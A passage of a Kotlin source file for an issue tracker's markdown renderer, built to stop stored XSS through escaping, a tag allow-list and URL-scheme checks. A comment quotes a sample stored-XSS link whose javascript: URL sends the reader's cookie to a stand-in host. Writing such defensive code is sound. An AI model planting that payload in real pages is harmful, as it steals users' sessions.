/**
 * Markdown → HTML, with an allow-list and no passthrough.
 *
 * ── Why this file is security code ───────────────────────────────────────────
 *
 * The editor has an underline button. No flavour of markdown has underline —
 * deliberately, because underlined text on the web means "link" — so the stored
 * format is markdown **plus a little inline HTML**: `<u>text</u>`.
 *
 * That one decision is what makes this file dangerous. The stored document now
 * legitimately contains HTML, on a field any signed-in user can write and every
 * other user will read. A renderer that passed raw HTML through — which is what
 * "just support a bit of HTML" means in practice, and what almost every markdown
 * library does when you enable it — is **stored XSS**, straight into a page
 * carrying the reader's session cookie.
 *
 * So: nothing in the input is ever treated as markup. Every `<`, `>`, `&` and
 * `"` is escaped *first*, unconditionally, and the only tags in the output are
 * ones this file emits itself. `<u>` survives because [restoreAllowedTags] puts
 * it back afterwards, from the escaped text, by exact match — not because it was
 * let through.
 *
 * Written by hand rather than pulled in: a markdown library is a large
 * dependency whose HTML-handling default is the one thing that must not be
 * wrong, and the subset here is nine constructs.
 *
 * @see se.soderbjorn.lunicle.client.viewmodel.IssueBackingViewModel
 */
package se.soderbjorn.lunicle.client

import se.soderbjorn.lunicle.clientserver.ApiRoutes
import se.soderbjorn.lunicle.clientserver.MentionSpan
import se.soderbjorn.lunicle.clientserver.mentionSpans

/**
 * Resolve a ticket reference to the issue's title, or null when it is not known —
 * the hook that lets a rendered `PREFIX-NUMBER` read `PREFIX-NUMBER: Title`
 * (LNL-144). Synchronous by design: rendering runs inline on a state change, so
 * the caller answers from data it already holds (the current board, a cache of
 * ones it has seen) and returns null rather than blocking for a fetch — an
 * unknown title just leaves the reference bare, exactly as before the title.
 */
typealias TicketTitleLookup = (Ticket) -> String?

/** The default title lookup: no titles, every reference stays bare. */
val NO_TICKET_TITLES: TicketTitleLookup = { null }

/**
 * What the two reference passes need to know, carried as one value.
 *
 * These four travel together from [renderMarkdown] all the way down to
 * [linkifyRefs] — through the block, paragraph and inline rules, none of which
 * read any of them — and threading four parameters through four functions that
 * only forward them is four chances for a call site to hand one on in the wrong
 * position.
 *
 * @property gitHubRepository the project's linked repository as `owner/name`, or
 *   null when none is configured or it is not the shape a repository has (LNL-178).
 *   Checked here rather than trusted, so the one place a repository name becomes an
 *   `href` cannot be reached with anything else — see [GITHUB_REPOSITORY].
 */
private class References(
    val prefixes: Collection<String>,
    val titleFor: TicketTitleLookup,
    val self: Ticket?,
    repository: String?,
) {
    val gitHubRepository: String? = repository?.takeIf { GITHUB_REPOSITORY.matches(it) }
}

/**
 * `owner/name`, and nothing else.
 *
 * The repository reaches this file as a string that the server parsed out of
 * whatever a project administrator pasted into the settings field, and it is the
 * one value in a GitHub link's `href` that did not come from [escapeHtml]'s pass —
 * the number after it is digits by construction. GitHub's own rules for both
 * halves are narrower than this; what matters is that nothing here can carry a
 * quote, a space, a `..` or a second scheme out of the `href` it is written into.
 */
private val GITHUB_REPOSITORY = Regex("[A-Za-z0-9._-]{1,100}/[A-Za-z0-9._-]{1,100}")

/**
 * `#123` → the pull request with that number (LNL-178).
 *
 * Group 1 is the character before the `#`, matched rather than looked behind for
 * [MARKDOWN_TARGET]'s reason — Kotlin/JS compiles to a unicode-mode regex, where
 * lookbehind is the browser's feature and not ours — and handed straight back.
 * What it excludes is the whole of the rule:
 *
 *  - a **letter or digit**, so `abc#1` is not a reference and neither is the tail
 *    of a `#c0ffee` colour. A `#` means "issue" when it opens a word, exactly as
 *    it does on GitHub.
 *  - an **`&`**, which is the one that would otherwise bite: by the time this runs
 *    every `'` in the source is the five characters `&#39;`, so a rule that took
 *    `#39` would turn every apostrophe in every description into a link to pull
 *    request 39.
 *
 * The digits must likewise end the word, so `#1a` and a `#1e5`-style number are
 * left alone. Not capped in length: a repository with six-figure pull requests
 * exists, and a cap would silently stop linking at the point it was guessed.
 */
private val GITHUB_REF = Regex("(^|[^A-Za-z0-9&])#(\\d+)(?![A-Za-z0-9])")

/**
 * The inline HTML the editor may produce, and the *only* tags restored after
 * escaping.
 *
 * `<u>` and nothing else, because underline is the only button with no markdown
 * spelling. Adding to this list is adding to the attack surface: each entry is a
 * tag a user can put in an issue that every reader's browser will execute as
 * markup. Anything with an attribute — `<a href>`, `<img src>` — must never
 * appear here, because attributes are where javascript: URLs and event handlers
 * live. Links and images have markdown spellings and are built by this file with
 * their URLs checked; see [renderLinks] and [isSafeMarkdownUrl].
 */
private val ALLOWED_INLINE_TAGS = listOf("u")

/**
 * The characters a backslash may neutralise, and the whole reason backslash
 * escaping exists here at all.
 *
 * The WYSIWYG editor never shows markup, so the only way it can represent text
 * that *contains* a marker — someone typing "2 * 3 * 4", or "#1 in the list" —
 * is to escape it on the way out. Without this, [serialiseMarkdown] would emit
 * the markers raw, this file would read them back as formatting, and the user's
 * text would silently change into something they never wrote. That is exactly
 * the round-trip corruption the editor's preamble used to warn about, and this
 * is the half of the answer that lives on the rendering side.
 *
 * Deliberately only the characters this renderer acts on. Escaping more would
 * mean `\` before punctuation that means nothing here, and every one of those
 * would show up as a literal backslash the moment anything else read the stored
 * document.
 */
private const val ESCAPABLE = "\\*~`[]!<#-"

/** The subset that is significant anywhere in a line, as opposed to only at its start. */
private const val INLINE_ESCAPABLE = "\\*~`[]!<"

/**
 * Where an escaped character hides while the rules run.
 *
 * An escaped `*` cannot stay a `*` — the italic rule would match it — and it
 * cannot become its final text either, because that text has to be HTML-escaped
 * *after* [restoreAllowedTags] has had its say. So each one becomes a private-use
 * character, chosen because no rule in this file matches one and no keyboard
 * produces one, and turns back into itself at the very end.
 */
private const val PLACEHOLDER_BASE = '\uE000'

/**
 * Escape the markers that are significant mid-line, for [serialiseMarkdown].
 *
 * The block-level markers (`#`, `- `) are [escapeMarkdownBlock]'s job, because
 * whether they mean anything depends on where in the line they sit — a `-` in
 * "well-formed" is a hyphen, and escaping every one of them would litter the
 * stored document for nothing.
 */
fun escapeMarkdown(text: String): String = buildString(text.length) {
    text.forEach { c ->
        if (c in INLINE_ESCAPABLE) append('\\')
        append(c)
    }
}

/**
 * Escape a line that would otherwise be read as a heading or a list item.
 *
 * Applied to an assembled paragraph, per line: "# 1 sold" typed as prose is a
 * paragraph in the editor, and must not come back as an `<h1>`.
 */
fun escapeMarkdownBlock(text: String): String =
    text.lines().joinToString("\n") { line ->
        if (BLOCK_MARKER.containsMatchIn(line)) {
            val indent = line.takeWhile { it == ' ' }
            indent + "\\" + line.drop(indent.length)
        } else {
            line
        }
    }

private val BLOCK_MARKER = Regex("^ *(#{1,6} |- )")

/** Swap each `\x` for its placeholder, before anything else can read the `x`. */
private fun extractEscapes(text: String): String = buildString(text.length) {
    var i = 0
    while (i < text.length) {
        val c = text[i]
        val slot = if (c == '\\' && i + 1 < text.length) ESCAPABLE.indexOf(text[i + 1]) else -1
        if (slot >= 0) {
            append(PLACEHOLDER_BASE + slot)
            i += 2
        } else {
            // A backslash before anything else is just a backslash. Swallowing
            // it would corrupt a Windows path someone pasted into an issue.
            append(c)
            i++
        }
    }
}

/** Turn the placeholders back into their characters, HTML-escaped as text. */
private fun restoreEscapes(text: String): String = buildString(text.length) {
    text.forEach { c ->
        val slot = c - PLACEHOLDER_BASE
        if (slot in ESCAPABLE.indices) append(ESCAPABLE[slot].toString().escapeHtml()) else append(c)
    }
}

/**
 * Drop any placeholder character the input already contained.
 *
 * Otherwise the input could forge one: a document containing U+E007 literally
 * would come out the other end as a `[`, having never been escaped — a way to
 * smuggle a marker past the rules that is not available to anyone typing.
 */
private fun stripPlaceholders(text: String): String =
    text.filter { (it - PLACEHOLDER_BASE) !in ESCAPABLE.indices }

/**
 * Escape everything. The first thing that happens to any input, always.
 *
 * `"` and `'` are escaped along with the obvious three because rendered text
 * lands inside attribute values in [renderImages] and [renderLinks] — an
 * unescaped quote there closes the attribute and opens a tag.
 */
private fun String.escapeHtml(): String = buildString(length) {
    this@escapeHtml.forEach { c ->
        when (c) {
            '&' -> append("&amp;")
            '<' -> append("&lt;")
            '>' -> append("&gt;")
            '"' -> append("&quot;")
            '\'' -> append("&#39;")
            else -> append(c)
        }
    }
}

/**
 * Is this URL safe to put in an `href` or a `src`?
 *
 * Public because the editor asks it too, before putting a typed URL into a live
 * `href` in the document being edited. Same question, same answer, one
 * implementation — a second scheme check written on the editor's side is a
 * second thing to get wrong.
 *
 * An allow-list of schemes, because the interesting attack is not a tag at all:
 * `[click](javascript:fetch('//evil/'+document.cookie))` is valid markdown, and
 * a renderer that emits the href verbatim has just executed a script on click.
 * `data:` is refused for the same reason — `data:text/html,...` in an href is a
 * same-tab navigation into attacker-controlled HTML.
 *
 * Relative URLs are allowed, and are the common case: every uploaded image is
 * `/api/attachments/<id>`.
 */
fun isSafeMarkdownUrl(url: String): Boolean {
    val trimmed = url.trim().lowercase()
    // A scheme-relative URL (//evil.example) inherits our scheme and is a real
    // off-site link, but it is also a legitimate thing to write. It is the
    // colon-bearing schemes that decide execution, so those are what is checked.
    if (!trimmed.contains(':')) return true
    return trimmed.startsWith("http://") ||
        trimmed.startsWith("https://") ||
        trimmed.startsWith("mailto:")
}

/**
 * Render markdown to HTML that is safe to assign to `innerHTML`.
 *
 * Supports what the editor's toolbar can produce — headings, bold, italic,
 * strikethrough, inline code, links, images and `<u>` — plus the two block-level
 * constructs the toolbar has no button for and an agent writing through the MCP
 * server produces constantly: a ``` fence, and a run of lines that is evidently a
 * diagram (LNL-181). Everything else is text.
 *
 * @param markdown the stored document.
 * @param prefixes the project prefixes whose issues, written as `PREFIX-NUMBER`,
 *   are turned into links (LNL-139) — the reader's accessible projects, so a
 *   reference across projects links too and a click switches to get there. Empty
 *   — the default — turns none into links, which is what a reading surface with no
 *   projects behind it (a forum message, say) wants, and what keeps the editor's
 *   live copy inert. See [renderRefs].
 * @param self the issue this surface is already showing, or null. A reference to
 *   it — a card leading with its own key, an issue naming itself in its own body —
 *   is left as plain text rather than a link back to the page you are on (LNL-151).
 *   See [linkifyRefs].
 * @param titleFor the issue title to show after a reference, so `LNL-1` reads
 *   `LNL-1: Fix the thing` (LNL-144); returning null or blank leaves the reference
 *   bare, which is the default and what the editor's live copy and any surface
 *   with no title source want. See [linkifyRefs].
 * @param gitHubRepository the repository this project is linked to, `owner/name`,
 *   which turns a `#123` in the text into a link to that pull request (LNL-178).
 *   Null — the default — leaves every `#123` as the text it always was, which is
 *   what a project with no repository configured, and every surface with no project
 *   behind it at all, wants. See [GITHUB_REF].
 * @return HTML with no tag in it that this file did not emit.
 */
// The lookup stays last so a caller can pass it as a trailing lambda.
fun renderMarkdown(
    markdown: String,
    prefixes: Collection<String> = emptyList(),
    self: Ticket? = null,
    gitHubRepository: String? = null,
    titleFor: TicketTitleLookup = NO_TICKET_TITLES,
): String {
    val refs = References(prefixes, titleFor, self, gitHubRepository)
    // Fences come off the top, before the escape machinery below can read a
    // single character of them. See splitFences for why that ordering is the
    // whole point of a fence rather than an implementation detail.
    return splitFences(markdown)
        .map { segment -> if (segment.fenced) fencedBlock(segment) else renderProse(segment.text, refs) }
        .filter { it.isNotEmpty() }
        .joinToString("\n")
}

/** Everything outside a fence: the pipeline this file has always been. */
private fun renderProse(markdown: String, refs: References): String {
    // Backslash escapes come out first, into placeholders. This has to precede
    // escapeHtml: "\<" must be recognised while it is still a "<", and one line
    // further down it is the string "&lt;".
    val source = extractEscapes(stripPlaceholders(markdown))

    // Escape SECOND, and before any rule runs. Everything below operates on
    // already-escaped text, so a "<script>" in the source is the literal string
    // "&lt;script&gt;" by the time any rule sees it, and no rule can turn it
    // back into a tag. Placeholders pass through untouched — they are none of
    // the five characters this escapes.
    val escaped = source.escapeHtml()

    val rendered = escaped.split("\n\n")
        .mapNotNull { block -> if (block.isBlank()) null else renderBlock(block, refs) }
        .filter { it.isNotEmpty() }
        .joinToString("\n")

    // Placeholders resolve LAST, after restoreAllowedTags has run inside every
    // block. The order matters and is not obvious: an escaped "<" that resolved
    // any earlier would be a "&lt;" sitting next to the "&gt;" of an unescaped
    // ">", and restoreAllowedTags — which matches "&lt;u&gt;" by exact string —
    // would turn the text someone escaped precisely to keep inert back into a
    // real <u> tag.
    return restoreEscapes(rendered)
}

/**
 * One run of the document: either prose, or the inside of a ``` fence.
 *
 * @property language the fence's info string — `kotlin` in ```` ```kotlin ```` —
 *   or empty. Kept rather than dropped so the serialiser can write the same fence
 *   back; nothing here highlights anything. Constrained to [FENCE]'s character
 *   class, which is what makes it safe to write into a class attribute.
 */
private class Segment(val text: String, val fenced: Boolean, val language: String = "")

/**
 * A fence line: three or more backticks alone, with an optional info string.
 *
 * Up to three leading spaces, as CommonMark allows, and no more — a fence
 * indented four spaces is somebody's diagram, not a fence.
 */
private val FENCE = Regex(" {0,3}```+ *([A-Za-z0-9+#._-]{0,20}) *")

/**
 * Cut the document into prose and fenced code, before anything else runs.
 *
 * ── Why this happens first, and not as a block rule ─────────────────────────
 *
 * Because "verbatim" is the entire meaning of a fence, and every other stage of
 * this file exists to *interpret* text. A fence that were split out later would
 * already have been through [extractEscapes], so a `\[` in a pasted code sample
 * would have lost its backslash to a rule the author was explicitly opting out
 * of; and it would have been split on `\n\n`, so a code sample with a blank line
 * in it would have become two blocks. Neither is recoverable afterwards. Lifting
 * the fences off the top is the only ordering where the text inside one is the
 * text that was written.
 *
 * [escapeHtml] still runs over it — see [fencedBlock]. Being verbatim is about
 * what the *markdown* rules may do to it; it is never about letting a `<script>`
 * through, and a code block is the single most likely place for someone to paste
 * one.
 *
 * An unclosed fence runs to the end of the document, which is what GitHub does
 * and the only answer that lets someone type an opening fence and then its
 * contents. A fence closes on a *bare* fence line only, so a ```` ```kotlin ````
 * inside a block is that block's content.
 */
private fun splitFences(markdown: String): List<Segment> {
    // The overwhelmingly common document has no fence in it at all.
    if (!markdown.contains("```")) return listOf(Segment(markdown, fenced = false))

    val segments = mutableListOf<Segment>()
    val buffer = StringBuilder()
    // Non-null exactly while inside a fence, carrying that fence's info string.
    var language: String? = null

    fun flush() {
        val text = buffer.toString()
        buffer.clear()
        val open = language
        if (open != null) segments.add(Segment(text, fenced = true, language = open))
        else if (text.isNotBlank()) segments.add(Segment(text, fenced = false))
    }

    markdown.lines().forEach { line ->
        val fence = FENCE.matchEntire(line)
        if (fence != null && (language == null || fence.groupValues[1].isEmpty())) {
            flush()
            language = if (language == null) fence.groupValues[1] else null
            return@forEach
        }
        buffer.appendLine(line)
    }
    flush()
    return segments
}

/**
 * The inside of a fence → `<pre><code>`.
 *
 * Escaped and otherwise untouched: no rule in this file runs over it, so a `*`
 * stays a `*` and a `#` at the start of a line stays a `#`.
 *
 * The indentation survives only because the CSS says so. Everything else this
 * file emits collapses its whitespace — that is HTML's default — so a `<pre>`
 * without `white-space: pre` renders a diagram as one squashed line of words.
 * The rule is `.markdown pre` in styles.css, and it is load-bearing.
 *
 * An empty fence renders as nothing rather than as an empty `<pre>`, which in
 * the editor's contenteditable is a block the caret can fall into and not get
 * out of.
 */
private fun fencedBlock(segment: Segment): String {
    val code = segment.text.trimEnd('\n')
    if (code.isBlank()) return ""
    // The language is [FENCE]'s character class and nothing else — no quote, no
    // space, no angle bracket — so it cannot leave the attribute it is written
    // into. That is checked by construction rather than here; see Segment.
    val language = if (segment.language.isEmpty()) "" else " class=\"language-${segment.language}\""
    return "<pre><code$language>${code.escapeHtml()}</code></pre>"
}

/**
 * Turn the bare URLs in a line of plain text into links, and touch nothing else.
 *
 * The counterpart to [renderMarkdown] for a field that is not markdown. An issue
 * title is a plain-text line with no editor behind it: nothing there ever emits
 * `**` or `#`, so rendering "2 * 3" as anything but itself would be inventing
 * formatting the author never wrote, and drawing an `<img>` inside a board card
 * from `![x](y)` would be worse. What a title *can* carry is a URL somebody
 * pasted, and LNL-44's promise — a link written as itself becomes clickable —
 * should hold on a card too. So this runs only the autolink half of the pipeline.
 *
 * The security discipline is [renderMarkdown]'s, unchanged and for the same
 * reason: [stripPlaceholders] then [escapeHtml] run first, so every character of
 * the title is inert text before any pattern sees it, and the only tags in the
 * output are the `<a>`s [externalLink] builds from a URL it has checked.
 *
 * It reuses [MARKDOWN_TARGET] rather than a second regex — the `www.`
 * word-boundary handling and the placeholder exclusions are exactly the
 * subtleties that must not drift between two copies. The markdown-link and image
 * branch is matched but deliberately handed back verbatim: `[label](url)` in a
 * plain-text title is not markup, so it stays as written, brackets and all.
 *
 * @param prefixes as in [renderMarkdown] — a `PREFIX-NUMBER` in a title becomes a
 *   link to that issue too (LNL-139), which is the whole point of the ticket that
 *   asked for it on the card as well as in the body.
 * @param self as in [renderMarkdown] — the issue this surface already shows, whose
 *   own key stays plain text rather than a link back to itself (LNL-151).
 * @param titleFor as in [renderMarkdown] — the referenced issue's title, appended
 *   after the reference (LNL-144), or null to leave it bare.
 * @param gitHubRepository as in [renderMarkdown] — a `#123` in a title is a link to
 *   that pull request when the project is linked to a repository (LNL-178).
 */
// The lookup stays last, as in [renderMarkdown], so it can be a trailing lambda.
fun renderInlineLinks(
    text: String,
    prefixes: Collection<String> = emptyList(),
    self: Ticket? = null,
    gitHubRepository: String? = null,
    titleFor: TicketTitleLookup = NO_TICKET_TITLES,
): String {
    val escaped = stripPlaceholders(text).escapeHtml()
    val linked = MARKDOWN_TARGET.replace(escaped) { match ->
        val bare = match.groupValues[4]
        if (bare.isNotEmpty()) return@replace autolink(bare)

        // Group 5 is the character the www branch consumed to prove a word
        // boundary — never part of the link, handed straight back.
        val schemeless = match.groupValues[6]
        if (schemeless.isNotEmpty()) {
            return@replace match.groupValues[5] + autolink(schemeless, scheme = "https://")
        }

        // A markdown-link or image match: not markup in a title, left as written.
        match.value
    }
    return renderRefs(linked, References(prefixes, titleFor, self, gitHubRepository))
}

/**
 * One block, split into the runs of lines that are a diagram and the runs that
 * are prose.
 *
 * The ticket asks for the *portion* to be monospaced and not the whole field
 * (LNL-181), and a block is where that is decided: an agent writing "here is the
 * layout:", a table, and "…and that is it" writes all three as one block with no
 * blank lines between them, and only the middle one is a diagram.
 *
 * Blank lines are trimmed off the ends rather than the whole block being
 * trimmed, which is the one thing that changed here for indentation's sake: a
 * `String.trim()` takes the leading spaces off the first line, and for a diagram
 * that opens with an indented line those spaces are the drawing.
 */
private fun renderBlock(block: String, refs: References): String {
    val lines = block.lines().dropWhile { it.isBlank() }.dropLastWhile { it.isBlank() }
    val kept = lines.filter { it.isNotBlank() }
    if (kept.isEmpty()) return ""

    // A list is a list. Its bullets align by construction, and the column rule
    // in [sharesColumn] would read that alignment as a table and monospace the
    // whole thing. Answered before the heuristic runs rather than inside it,
    // because the giveaway is the shape of the block and not of a line.
    if (kept.all { it.trimStart().startsWith("- ") }) return renderProseBlock(lines, refs)

    val diagram = diagramLines(lines)
    if (diagram.none { it }) return renderProseBlock(lines, refs)

    val out = mutableListOf<String>()
    var start = 0
    while (start < lines.size) {
        var end = start + 1
        while (end < lines.size && diagram[end] == diagram[start]) end++
        val run = lines.subList(start, end)
        out.add(if (diagram[start]) preBlock(run) else renderProseBlock(run, refs))
        start = end
    }
    return out.filter { it.isNotEmpty() }.joinToString("\n")
}

/**
 * One paragraph, heading, or list.
 *
 * A heading is a *line*, not a block, so "# Title" followed by a line of prose
 * is a heading and a paragraph rather than one odd-looking heading. Handled by
 * splitting the block rather than with a dot-matches-all regex, because that
 * option is JVM-only — `RegexOption.DOT_MATCHES_ALL` does not exist on
 * Kotlin/JS, and this file is common code compiled for both.
 */
private fun renderProseBlock(lines: List<String>, refs: References): String {
    val kept = lines.filter { it.isNotBlank() }
    if (kept.isEmpty()) return ""

    if (kept.all { it.trimStart().startsWith("- ") }) {
        val items = kept.joinToString("") { "<li>${renderInline(it.trimStart().removePrefix("- "), refs)}</li>" }
        return "<ul>$items</ul>"
    }

    // Trimmed because the block is no longer: a heading indented by a space was
    // a heading back when the whole block was trimmed, and still is.
    val heading = HEADING.find(kept.first().trim())
    if (heading != null) {
        val level = heading.groupValues[1].length
        val rendered = "<h$level>${renderInline(heading.groupValues[2].trim(), refs)}</h$level>"
        val rest = kept.drop(1)
        return if (rest.isEmpty()) rendered else rendered + "\n" + paragraph(rest.joinToString("\n"), refs)
    }

    return paragraph(lines.joinToString("\n").trim(), refs)
}

/**
 * A run of lines that is evidently a drawing → `<pre>`.
 *
 * Inert, exactly as a fence is: no inline rule runs over it, so the `*` in a
 * diagram is a `*` and a `PREFIX-1` in a table cell is not linked. That last one
 * is a deliberate loss rather than an oversight — a ticket reference renders as
 * the key *plus the issue's title* (LNL-144), and injecting a title into a table
 * cell would push every column after it out of alignment. Monospacing a diagram
 * and then breaking it is worse than not linking inside it.
 */
private fun preBlock(lines: List<String>): String {
    val text = lines.joinToString("\n").trimEnd()
    return if (text.isBlank()) "" else "<pre>$text</pre>"
}

/**
 * Which of these lines belong to a drawing? (LNL-181)
 *
 * ── What the evidence is ────────────────────────────────────────────────────
 *
 * A heuristic over text nobody marked up has exactly one failure that matters:
 * calling prose a diagram, which drops it into a `<pre>` where it will not wrap,
 * will not linkify, and will be monospaced in the middle of a paragraph. So each
 * signal here is one that prose does not produce by accident:
 *
 *  - **[isDrawnLine]** — the line contains a box-drawing character, or is made
 *    only of rule characters (`─────`, `-------`, `+---+---+`), or is a pipe row
 *    (`| a | b |`). All three are somebody drawing something.
 *  - **[sharesColumn]** — two consecutive lines start a column at the *same*
 *    position: a run of two or more spaces, ending at the same index on both,
 *    with content before it on both. This is the only thing that finds the
 *    space-aligned table an agent writes without any borders at all, and it is
 *    diagnostic because prose does not line its double spaces up.
 *
 * Then two rules that shape the runs rather than find them: a blank line between
 * two drawn lines is part of the drawing, and a *lone* line is never one. The
 * second is what keeps a stray `---` or an "a | b" out of a `<pre>` — a drawing
 * that is one line tall is not a drawing, it is a sentence with a dash in it.
 *
 * Runs on the escaped text, which is safe and slightly useful: [escapeHtml]
 * touches none of the characters any signal looks for, and an author who escaped
 * a `-` to stop it meaning anything has turned it into a placeholder, which
 * reads as prose here too.
 */
private fun diagramLines(lines: List<String>): BooleanArray {
    val diagram = BooleanArray(lines.size)
    lines.forEachIndexed { index, line -> if (isDrawnLine(line)) diagram[index] = true }
    for (index in 0 until lines.size - 1) {
        if (sharesColumn(lines[index], lines[index + 1])) {
            diagram[index] = true
            diagram[index + 1] = true
        }
    }
    fillBlankGaps(lines, diagram)
    dropLoneLines(diagram)
    return diagram
}

/**
 * Box drawing and block elements: `─ │ ┌ ┼ ╔ █ ░`.
 *
 * The geometric shapes just above this range (`■ ● ▲`) are deliberately left
 * out — they turn up in prose as bullets and decoration, and one of them in a
 * sentence is not a diagram.
 */
private val BOX_DRAWING = '─'..'▟'

/** A line made only of rule characters and spaces, with at least three in a row. */
private val RULE_LINE = Regex("[-=+~_|\\s]*[-=+~_]{3}[-=+~_|\\s]*")

/** A table row: opens and closes with a pipe. */
private val PIPE_ROW = Regex("\\s*\\|.*\\|\\s*")

private fun isDrawnLine(line: String): Boolean =
    line.any { it in BOX_DRAWING } || RULE_LINE.matchEntire(line) != null || PIPE_ROW.matchEntire(line) != null

/**
 * Do these two lines start a column at the same place?
 *
 * Bullets are excluded outright: "- one    two" over "- three    four" shares a
 * column and is still a list, and [renderBlock]'s whole-block guard does not
 * catch a list that is only part of a mixed block.
 */
private fun sharesColumn(first: String, second: String): Boolean {
    if (first.trimStart().startsWith("- ") || second.trimStart().startsWith("- ")) return false
    val columns = columnStarts(first)
    return columns.isNotEmpty() && columnStarts(second).any { it in columns }
}

/**
 * The positions in a line where a new column begins.
 *
 * A column start is a non-space with two or more spaces before it and *something*
 * before those, which is what separates an interior gap from the line's leading
 * indent. Measured at the position the next column starts rather than where the
 * gap opens, and that is the whole reason this works: a table's columns line up
 * at their left edge, while the gaps in front of them are as wide as the previous
 * cell's content is short. "foo         open" and "----        ------" share no
 * gap position at all, and both start a column at 12.
 */
private fun columnStarts(line: String): Set<Int> {
    val starts = mutableSetOf<Int>()
    var gap = 0
    line.forEachIndexed { index, c ->
        if (c == ' ') {
            gap++
        } else {
            if (gap >= 2 && index > gap) starts.add(index)
            gap = 0
        }
    }
    return starts
}

/** A blank line with drawing on both sides is the drawing's own whitespace. */
private fun fillBlankGaps(lines: List<String>, diagram: BooleanArray) {
    var index = 0
    while (index < diagram.size) {
        if (diagram[index] || !lines[index].isBlank()) {
            index++
            continue
        }
        var end = index
        while (end < diagram.size && !diagram[end] && lines[end].isBlank()) end++
        if (index > 0 && diagram[index - 1] && end < diagram.size && diagram[end]) {
            for (blank in index until end) diagram[blank] = true
        }
        index = maxOf(end, index + 1)
    }
}

/** A one-line "drawing" is a sentence that happened to contain a dash. */
private fun dropLoneLines(diagram: BooleanArray) {
    var start = 0
    while (start < diagram.size) {
        if (!diagram[start]) {
            start++
            continue
        }
        var end = start
        while (end < diagram.size && diagram[end]) end++
        if (end - start < 2) diagram[start] = false
        start = end
    }
}

/** Headings: # through ######, matching the toolbar's buttons. Seven is not a heading. */
private val HEADING = Regex("^(#{1,6})\\s+(.*)$")

/**
 * A paragraph.
 *
 * A single newline becomes a line break, which is what someone typing into a
 * textarea means by it. Markdown's "two trailing spaces" rule is a trap nobody
 * discovers on purpose, and invisible in the field where it would have to be
 * typed.
 */
private fun paragraph(text: String, refs: References): String =
    "<p>${renderInline(text, refs).replace("\n", "<br>")}</p>"

/** Inline rules, in an order that matters — see the comments. */
private fun renderInline(text: String, refs: References): String {
    var out = text

    // Images, links and bare URLs in ONE pass. See renderTargets for why they
    // cannot be three.
    out = renderTargets(out)

    // Bold before italic, and the order is load-bearing: "**x**" contains "*x*",
    // so italic first would eat the inner pair and leave "*<em>x</em>*".
    //
    // Running bold first is also what lets the italic rule stay simple. By the
    // time it runs, every "**" has already become a <strong>, so any "*" still
    // standing is an italic marker — no lookbehind needed to tell them apart.
    // That matters: lookbehind is ES2018, and Safari did not ship it until
    // 16.4, so a regex using it compiles happily and then fails at runtime in
    // one browser.
    out = out.replace(Regex("\\*\\*([^*]+)\\*\\*"), "<strong>$1</strong>")
    out = out.replace(Regex("\\*([^*\\n]+)\\*"), "<em>$1</em>")
    out = out.replace(Regex("~~([^~]+)~~"), "<del>$1</del>")
    out = out.replace(Regex("`([^`]+)`"), "<code>$1</code>")

    // Last, so the rules above have already run over the text a mention sits in.
    out = renderMentions(out)

    // After everything else, and over the tags everything else has emitted:
    // renderRefs will not linkify inside a link, a code span or a mention, which
    // are exactly the constructs already standing by now. See its comment.
    out = renderRefs(out, refs)

    return restoreAllowedTags(out)
}

/**
 * `@{Ada Lovelace}` and `@grace` → a coloured mention, with the syntax gone.
 *
 * Nobody should have to read punctuation to find out that a person was named.
 * The braces exist so the *stored* document says unambiguously where a name ends
 * — see [mentionSpans] — and a reader has no use for them at all, so this is
 * where they stop.
 *
 * ── The attribute, and why it is not decoration ─────────────────────────────
 *
 * `data-mention` carries the name the mention actually named, which is not
 * always what the span *reads*: the span reads "@Ada Lovelace", and the document
 * said `@{Ada Lovelace}`. [serialiseMarkdown] reads the attribute back and
 * re-emits the canonical spelling, which is what makes the round trip closed. Do
 * not remove it in the belief that the text is enough — without it, editing a
 * description would rewrite `@{Ada Lovelace}` as a bare `@Ada Lovelace`, which
 * is no longer a mention of anybody and would silently stop notifying her.
 *
 * The span carries a class and a data attribute and no URL, which is why adding
 * it does not widen what [ALLOWED_INLINE_TAGS] guards: this file emits the tag
 * itself, from a name that was HTML-escaped before any rule ran, exactly as it
 * emits `<strong>`. A mention naming somebody who does not exist is still drawn
 * as a mention — the renderer has no roster to check against, and inventing one
 * would mean shipping the account directory to every reader of a public board.
 */
private fun renderMentions(text: String): String {
    val spans = mentionSpans(text).filterNot { it.isInsideTag(text) }
    if (spans.isEmpty()) return text
    return buildString(text.length) {
        var cursor = 0
        spans.forEach { span ->
            append(text, cursor, span.start)
            // The name is already HTML-escaped — it came out of a string that
            // escapeHtml ran over before any rule did — so it is safe both as
            // text and inside the quoted attribute, whose quotes escapeHtml also
            // escaped. See renderMarkdown's ordering.
            append("<span class=\"mention\" data-mention=\"").append(span.name).append("\">@")
                .append(span.name).append("</span>")
            cursor = span.end
        }
        append(text, cursor, text.length)
    }
}

/**
 * The elements a reference must never be drawn *inside*.
 *
 * `a` because an `<a>` inside an `<a>` is not surprising markup, it is broken
 * markup — the browser un-nests it — and `[LNL-1](https://x)` would produce
 * exactly that, an autolinked label sitting in an anchor. `code` because inline
 * code is text shown literally, and a link is the one thing it must not become.
 * `span` because the only span this file emits is a mention, and a mention that
 * happens to read `LNL-1` is a mention, not an issue link.
 */
private val REF_SKIP_ELEMENTS = setOf("a", "code", "span")

/**
 * Turn each reference in [html] into a link: `PREFIX-NUMBER` to that issue — the
 * render half of LNL-139, the click half being the web client's
 * `navigateToTicket` — and `#123` to that pull request on the project's linked
 * repository (LNL-178).
 *
 * Both kinds are linked in one walk because they are one question — "is this
 * position in the prose, and is it spoken for?" — and two walks would answer it
 * twice, the second one over anchors the first had just written.
 *
 * ── Why this walks tags instead of running a regex ──────────────────────────
 *
 * It runs *last*, over HTML the rest of the pipeline has already built, and a
 * reference is only a reference in the prose — never inside the `href` of a link
 * that merely contains `…/LNL-1` in its path, and never inside the anchor, code
 * span or mention listed in [REF_SKIP_ELEMENTS]. A regex replace cannot tell
 * "in the text" from "in a tag it emitted", which is the same trap
 * [MentionSpan.isInsideTag] exists to sidestep; here the constructs to avoid nest,
 * so a one-character look-back is not enough and a small scanner is.
 *
 * The scan is sound because of [renderMarkdown]'s ordering: every `<` and `>` from
 * the source is `&lt;`/`&gt;` by now and [restoreAllowedTags] has not run, so the
 * only real angle brackets left are the tags this file wrote itself. So each `<`
 * opens a known-well-formed tag, and the text between tags is exactly the prose a
 * reference may live in. That prose is already HTML-escaped, and the anchor's
 * `href` and `data-ticket` carry only [Ticket.toString] — a prefix and digits,
 * none of the five characters [escapeHtml] touches. The one thing that is *not*
